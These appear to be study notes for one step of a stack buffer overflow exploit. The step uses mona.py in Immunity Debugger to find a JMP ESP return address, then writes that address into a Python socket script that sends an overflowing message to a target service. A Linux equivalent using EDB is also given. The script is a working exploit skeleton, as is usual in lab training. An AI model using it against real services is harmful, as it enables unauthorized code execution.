Finding Right Module (Return address)

In this we will find breakpoint, JMP ESP is breakpoint. Basically it will stop the program from further command and will wait for us to enter malicious commands

Download mona.py from https://github.com/corelan/mona in folder location This PC>Local disk(C:)>Program Files(x86)>Immunity Inc>Immunity Debugger>PyCommands

At the bottom of Immunity Debugger there is a console where we can type:

!mona modules

It give modules . Check for modules with all values FALSE

💡

NOTE Remember to transfer all files along with vuln app in Enumeration as it will contain right module

!mona find -s “\xff\xe4” -m <module_name>

if it give 0 pointer then use another module with False value . \xff\xe4 is nasm value of JMP ESP

check the first result (like 625011af)

Edit the script.py and add result value in reverse format like this (\xaf\x11\x50\x62) . Don’t run it as malicious code will added in next step

🐍

import socket, sys
username = "test"
message = “A” * <offset location> + “<reverse_format_value>”
//example: message = “A” * 2023 + “\xaf\x11\x50\x62”
try:
print("Sending payload...")
s=socket.socket (socket.AF_INET,socket.SOCK_STREAM)
s.connect(('<ip>',<port>))
s.recv(1024)
s.send(username + '\r\n')
s.recv(1024)
s.send(message + '\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()

💡

For Linux

In EDB debugger , select plugin > OpcodeSearcher
In Jump Equivalent select ESP → EIP , click vuln exec and click find